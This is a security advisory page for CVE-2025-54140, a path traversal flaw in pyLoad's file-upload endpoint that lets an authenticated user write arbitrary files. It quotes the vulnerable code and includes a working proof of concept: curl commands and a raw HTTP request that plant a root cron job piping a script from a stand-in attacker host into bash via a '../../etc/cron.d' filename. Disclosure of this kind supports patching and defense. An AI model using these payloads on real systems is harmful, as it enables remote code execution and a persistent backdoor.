CVE-2025-54140
HIGH7.5EPSS 1.6%`pyLoad` has Path Traversal Vulnerability in `json/upload` Endpoint that allows Arbitrary File Write
Description
## Summary An **authenticated path traversal vulnerability** exists in the `/json/upload` endpoint of the `pyLoad` By **manipulating the filename of an uploaded file**, an attacker can traverse out of the intended upload directory, allowing them to **write arbitrary files to any location** on the system accessible to the pyLoad process. This may lead to: * **Remote Code Execution (RCE)** * **Local Privilege Escalation** * **System-wide compromise** * **Persistence and backdoors** --- ### Vulnerable Code File: [`src/pyload/webui/app/blueprints/json_blueprint.py`](https://github.com/pyload/pyload/blob/df094db67ec6e25294a9ac0ddb4375fd7fb9ba00/src/pyload/webui/app/blueprints/json_blueprint.py#L109) ```python @json_blueprint.route("/upload", methods=["POST"]) def upload(): dir_path = api.get_config_value("general", "storage_folder") for file in request.files.getlist("file"): file_path = os.path.join(dir_path, "tmp_" + file.filename) file.save(file_path) ``` **Issue**: No sanitization or validation on `file.filename`, allowing traversal via `../../` sequences. ### (Proof of Concept) 1. **Clone and install pyLoad from source** (`pip install pyload-ng`): ```bash git clone https://github.com/pyload/pyload cd pyload git checkout 0.4.20 python -m pip install -e . pyload --userdir=/tmp/pyload ``` 2. **Or install via pip (PyPi) in virtualenv:** ```bash python -m venv pyload-env source pyload-env/bin/activate pip install pyload==0.4.20 pyload ``` 1. **Login and obtain session token** ```bash curl -c cookies.txt -X POST http://127.0.0.1:8000/login \ -d "username=admin&password=admin" ``` 2. **Create malicious cron payload** ```bash echo "*/1 * * * * root curl http://attacker.com/payload.sh | bash" > exploit ``` 3. **Upload file with path traversal filename** ```bash curl -b cookies.txt -X POST http://127.0.0.1:8000/json/upload \ -F "file=@exploit;filename=../../../../etc/cron.d/pyload_backdoor" ``` 4. On the next cron tick, a reverse shell or payload will be triggered. ### BurpSuite HTTP Request ``` POST /json/upload HTTP/1.1 Host: 127.0.0.1:8000 Cookie: session=SESSION_ID_HERE Content-Type: multipart/form-data; boundary=------------------------d74496d66958873e --------------------------d74496d66958873e Content-Disposition: form-data; name="file"; filename="../../../../etc/cron.d/pyload_backdoor" Content-Type: application/octet-stream */1 * * * * root curl http://attacker.com/payload.sh | bash --------------------------d74496d66958873e-- ```
Affected packages (1)
- PyPI/pyload-ng>= 0.5.0b3.dev89, < 0.5.0b3.dev90
CVSS scores
| Source | Version | Severity | Vector |
|---|---|---|---|
| osv | CVSS 3.1 | HIGH7.5 | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N |
References (5)
- ADVISORYhttps://nvd.nist.gov/vuln/detail/CVE-2025-54140
- PATCHhttps://github.com/pyload/pyload
- WEBhttps://github.com/pyload/pyload/blob/df094db67ec6e25294a9ac0ddb4375fd7fb9ba00/src/pyload/webui/app/blueprints/json_blueprint.py#L109
- WEBhttps://github.com/pyload/pyload/commit/fc4b136e9c4e7dcbb8e467ae802cb2c3f70a71b0
- WEBhttps://github.com/pyload/pyload/security/advisories/GHSA-xqpg-92fq-grfg